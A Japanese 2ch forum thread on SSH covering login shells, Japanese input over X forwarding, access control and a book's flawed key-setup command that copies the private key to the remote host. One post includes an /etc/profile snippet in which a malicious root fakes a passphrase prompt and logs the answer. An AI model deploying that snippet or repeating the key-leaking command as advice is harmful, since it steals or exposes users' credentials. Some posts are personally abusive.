SSHに関する情報交換のスレッドです。
FAQ、リンク集は >>2-5 あたり。
■前スレ
SSH その7
http://toro.2ch.net/test/read.cgi/unix/1266323017/
■過去スレ
その6 http://pc12.2ch.net/test/read.cgi/unix/1202782840/
その5 http://pc11.2ch.net/test/read.cgi/unix/1145484540/
その4 http://pc8.2ch.net/test/read.cgi/unix/1102242908/
その3 http://pc5.2ch.net/unix/kako/1058/10582/1058202104.html
その2 http://pc.2ch.net/unix/kako/1028/10281/1028157825.html
その1 http://pc.2ch.net/unix/kako/976/976497035.html
探検
SSH その8
2014/04/25(金) 18:50:57.67
117名無しさん@お腹いっぱい。
2014/10/19(日) 15:35:56.742014/10/19(日) 16:35:04.00
自分がやるべきことを掲示板に丸投げしてドヤ顔かよw
2014/10/19(日) 19:45:24.65
ウソ教えられて、会議でそれを突っ込まれたら、2chで聞いたと言い訳するのかな?
120名無しさん@お腹いっぱい。
2014/10/19(日) 20:27:25.162014/10/19(日) 22:46:30.26
もうソース読んだ方が早いし確実じゃね。
2014/10/19(日) 23:12:00.13
かまってもらえるのは回答者にとって興味がある場合だけ
123名無しさん@お腹いっぱい。
2014/10/20(月) 02:45:14.372014/10/20(月) 14:33:56.81
かまうと調子こいてソースは?とかエビデンスは?とか言い始めるぞw
2014/10/20(月) 14:34:29.62
なら>>121でよし。
2014/10/21(火) 17:09:45.04
というわけで、このスレでのSSHに関する情報交換は全面禁止となりました。
2014/10/21(火) 18:21:36.12
ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか?
どうすればいいですか?
2014/10/21(火) 18:33:44.06
まずはその屏風からsshとかいうシェルを出してみてください
2014/10/21(火) 18:38:38.21
sshはすでにインストール済みで、動作確認済みです
2014/10/21(火) 18:45:40.37
2014/10/21(火) 19:11:18.03
2014/10/21(火) 19:24:07.55
/etc/shellsですか、ありがとうございます。
今環境がないので明日、客先で試してみます。
今環境がないので明日、客先で試してみます。
2014/10/21(火) 19:32:19.94
加齢臭コピペがくさいです
2014/10/21(火) 19:33:29.40
2014/10/26(日) 13:36:46.74
その後 132 の姿を見る者は居なかった
2014/10/26(日) 21:06:55.48
132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…
sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…
sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。
2014/10/26(日) 21:30:38.39
いつもの改変コピペ君だよ
2014/10/27(月) 14:20:34.23
UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね
2014/11/23(日) 17:53:17.21
SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの?
Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)
ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。
Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)
ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。
2014/11/24(月) 04:27:36.36
普通はできるだろ…とりあえず文字コード合ってる?
2014/11/24(月) 04:36:11.60
できないじゃなくて、どうなるか書かないと。
2014/11/24(月) 05:16:14.38
2014/11/29(土) 18:39:05.96
>139-142
失礼しやした。
結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。
で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。
これについては、
SSHのマニュアルか
http://www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
http://namazu.org/~tsuchiya/ssh/
http://uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。
失礼しやした。
結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。
で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。
これについては、
SSHのマニュアルか
http://www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
http://namazu.org/~tsuchiya/ssh/
http://uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。
144143
2014/11/29(土) 21:40:37.22 自己レス
>>143
LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。
それから、
cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。
orz
>>143
LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。
それから、
cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。
orz
2014/11/30(日) 04:07:35.69
.xsession
2014/11/30(日) 09:01:56.33
cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'
これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。
これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。
2014/11/30(日) 10:48:50.82
なんで秘密キーを公開キーのファイルに追記してんの?w
2014/11/30(日) 10:54:42.92
>>146
公開鍵登録しろよ。多分id_rsa.pub
公開鍵登録しろよ。多分id_rsa.pub
2014/12/01(月) 10:23:39.78
>>146
そんなやり方どこで聞いたんだ
そんなやり方どこで聞いたんだ
150名無しさん@お腹いっぱい。
2014/12/01(月) 11:04:16.75 >>147-149
川本安武とかいうバカが元凶のようだ。
http://books.google.co.jp/books?id=iUcoBQAAQBAJ&;lpg=PR1&hl=ja&pg=PA35#v=onepage&q&f=false
川本安武とかいうバカが元凶のようだ。
http://books.google.co.jp/books?id=iUcoBQAAQBAJ&;lpg=PR1&hl=ja&pg=PA35#v=onepage&q&f=false
2014/12/01(月) 12:25:54.94
「~/」を書かないんだな
2014/12/01(月) 15:20:31.53
~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。
>>や;も意図したとおりに解釈してくれないかも知れないが。
2014/12/03(水) 23:16:27.17
~/ を解釈しないシェルって何だ?
dashもbusyboxのshも解釈するぞ
dashもbusyboxのshも解釈するぞ
2014/12/03(水) 23:38:30.85
純正シェル。~はcsh由来だよ。
2014/12/04(木) 00:06:43.07
/bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなww
無理やり作ろうとしても大変だなww
2014/12/04(木) 01:00:08.15
商用UNIX環境で古いものだとそういうのもあるな
2014/12/04(木) 01:37:00.88
うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか?
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか?
2014/12/04(木) 02:02:22.75
~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。
2014/12/04(木) 06:52:38.02
>>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。
お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。
お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?
2014/12/04(木) 07:44:13.26
2014/12/04(木) 08:02:25.76
正当な批判をdisってるとか。死ねば?
2014/12/04(木) 08:58:42.72
だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ
2014/12/04(木) 09:10:17.44
やっぱり川本本人か。w
2014/12/04(木) 09:51:36.60
オッスオラ川本!
2014/12/04(木) 09:54:07.71
とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった
鵜呑みにしてやらかして逆切れしたことはわかった
2014/12/04(木) 09:56:28.68
新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
ttp://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない
ttp://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない
167名無しさん@お腹いっぱい。
2014/12/04(木) 09:58:54.50 「正当な批判」は作者と出版社に直接届けないと本人のためにならないぞ
http://gihyo.jp/book/2014/978-4-7741-6807-4
https://twitter.com/togakushi
http://gihyo.jp/book/2014/978-4-7741-6807-4
https://twitter.com/togakushi
2014/12/04(木) 10:55:15.15
間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。
2014/12/05(金) 00:16:32.57
>>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。
2014/12/05(金) 02:41:18.78
>>169
著者に「死ねば」と言ったのは 159
著者に「死ねば」と言ったのは 159
2014/12/05(金) 08:28:31.97
2014/12/05(金) 08:46:18.64
2014/12/05(金) 10:48:45.50
>>172
当たり前だ。タダでデバッグしてやる義理は無い。
当たり前だ。タダでデバッグしてやる義理は無い。
2014/12/05(金) 15:58:44.63
読者を危険に晒した!というほどのおおげさなことなん?
chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。
scpしてchmodする直前のスキをつくというのはナシね。
物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。
chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。
scpしてchmodする直前のスキをつくというのはナシね。
物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。
2014/12/05(金) 17:09:10.53
2014/12/05(金) 18:54:33.93
2014/12/05(金) 19:50:35.81
>>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん?
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん?
2014/12/05(金) 22:19:24.59
>>176
いや、問題ないよね? 秘密鍵のフォワードとかしてなければ
いや、問題ないよね? 秘密鍵のフォワードとかしてなければ
2014/12/05(金) 23:00:17.54
cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。
やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。
はタイプミスだろ。かなり痛いミスだけど。
やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。
2014/12/05(金) 23:21:07.02
>>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。
2014/12/06(土) 00:00:58.57
>>179
まぁどいつもこいつもわかってて弄ってるだけなので……
まぁどいつもこいつもわかってて弄ってるだけなので……
2014/12/06(土) 00:01:43.20
>>180
ログイン先に秘密鍵おいておくとか頭煮えてるの? おだいじにね
ログイン先に秘密鍵おいておくとか頭煮えてるの? おだいじにね
2014/12/06(土) 00:09:57.17
2014/12/06(土) 02:42:15.93
>>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…
2014/12/06(土) 03:02:41.76
>>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。
クライアント側で何か実行とかできるのかと思った。
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。
クライアント側で何か実行とかできるのかと思った。
2014/12/06(土) 07:22:31.63
2014/12/06(土) 16:04:33.63
誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。
一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。
いずれ正誤表くらい出るよ。
一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。
2014/12/06(土) 18:12:25.55
2014/12/06(土) 18:25:54.91
IPAに届けた上で、技評のトップページで謝罪訂正するレベル
2014/12/06(土) 18:32:25.86
だな
初心者がWebなんぞ見れるはずが無い
初心者がWebなんぞ見れるはずが無い
2014/12/06(土) 19:15:59.16
2014/12/06(土) 22:51:34.25
>>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。
2014/12/06(土) 23:13:35.29
鬼? 雑魚だよ。
2014/12/06(土) 23:57:36.44
結局、ただのやっかみかよ。
2014/12/07(日) 00:04:20.63
>>194
どこをどう読んだらそんな解釈になるんですか川本さん
どこをどう読んだらそんな解釈になるんですか川本さん
2014/12/07(日) 01:02:14.05
このスレに、川本さんは何人いるんだ。
2014/12/07(日) 23:50:08.35
悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね
# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi
# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi
2014/12/15(月) 12:41:54.46
2014/12/16(火) 11:02:27.42
あーあ何か変な奴に粘着されたなこのスレも…
2014/12/18(木) 09:07:32.46
>>199
おはよう、川本君。IPAには届け出たかね?
おはよう、川本君。IPAには届け出たかね?
2014/12/18(木) 11:35:04.54
川本が!川本が俺を殺しに来る!!
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11
これぐらいキレてもいいんだよきみ
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11
これぐらいキレてもいいんだよきみ
2015/04/03(金) 16:29:47.36
あけましておめでとう。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。
2015/04/03(金) 22:17:35.30
>>202
オレもポートは変えてる。
オレもポートは変えてる。
2015/04/06(月) 09:38:02.97
fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。
premitRootLogin noだしpassword認証も受け付けてないし。
2015/04/06(月) 13:57:05.84
22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし
わざわざ余計なログ吐かせて眺める趣味もないし
2015/04/07(火) 11:27:12.23
話の流れを切って悪いが、アクセス制限について質問です。
自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、
<TCP Wrapperの場合>/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
<PAM認証の場合>/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」
どっちでも同じ効果が得られる気がするんだが、挙動に違いはある?
PAM認証を用いた方が細かく制御できるってだけ?
悪い接続元を弾くタイミングが違うとか?
自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、
<TCP Wrapperの場合>/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
<PAM認証の場合>/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」
どっちでも同じ効果が得られる気がするんだが、挙動に違いはある?
PAM認証を用いた方が細かく制御できるってだけ?
悪い接続元を弾くタイミングが違うとか?
2015/04/07(火) 16:29:56.81
>>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。
tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。
hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。
sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。
設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。
tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。
hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。
sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。
設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。
2015/04/07(火) 18:21:18.49
2015/04/07(火) 23:46:54.67
具体的な質問 に 的確な回答
単純明快なやりとりは見てて清清しい
いい夜をありがとう
単純明快なやりとりは見てて清清しい
いい夜をありがとう
2015/04/08(水) 01:50:50.85
>>206
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ
2015/04/28(火) 11:48:29.85
本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様
2015/04/28(火) 13:15:39.86
もてもてだね。
213名無しさん@お腹いっぱい。
2015/05/31(日) 16:59:57.64 Tera Term r2【テラターム】 - No.823
http://peace.2ch.net/test/read.cgi/unix/1225116847/823n
823 :823:2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age!
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。
http://peace.2ch.net/test/read.cgi/unix/1225116847/823n
823 :823:2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age!
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。
2015/05/31(日) 18:34:44.39
なんか懐かしい名前だ。
Windows からは Cygwin の ssh だからどうでもいい。
Windows からは Cygwin の ssh だからどうでもいい。
2015/05/31(日) 20:10:21.19
自分もputtyもteratermも捨ててcygwinの使ってるわ
2015/05/31(日) 22:32:37.52
Cygwinはなー……ということでMSYS2派
レスを投稿する
ニュース
- 小野田紀美・経済安保担当相「何か気に入らないことがあればすぐに経済的威圧をする国への依存はリスク」 ★2 [Hitzeschleier★]
- 日本行き空路49万件キャンセル 中国自粛呼びかけ 日本行きチケット予約の約32%に相当 ★2 [ぐれ★]
- 【中国局長】両国関係に「深刻な影響」 首相発言の撤回要求 [蚤の市★]
- 外務省局長は無言で厳しい表情…日中の高官協議終了か 高市首相“台湾”発言で中国が強硬対応 発言撤回求めたか…★3 [BFU★]
- 【インバウンド】中国人観光客の日本での消費額は年間約2兆円超…中国政府は公務員の出張取り消し [1ゲットロボ★]
- 【維新】吉村知事「中国人観光客だけに頼るビジネスモデル変えていかないといけない」「高市総理の発言は撤回する必要はない」 [Hitzeschleier★]
- 【高市朗報】 日本政府「一昨年は1300億円。去年も防衛費が1100億円余ったw」 日本の防衛費は充分足りてる事が判明。増やす必要無し [485983549]
- 高市早苗「支持者の理解を得られないので台湾発言を撤回できない」 [931948549]
- 【実況】博衣こよりのえちえち歌枠🧪
- 【高市速報】日本人の3割「中国への武力行使に踏み切る必要がある」ANN世論調査 [931948549]
- 外務省局長、よくわからないまま帰国へ [834922174]
- 【速報】51歳まで自衛隊になれるように法改正ww [347751896]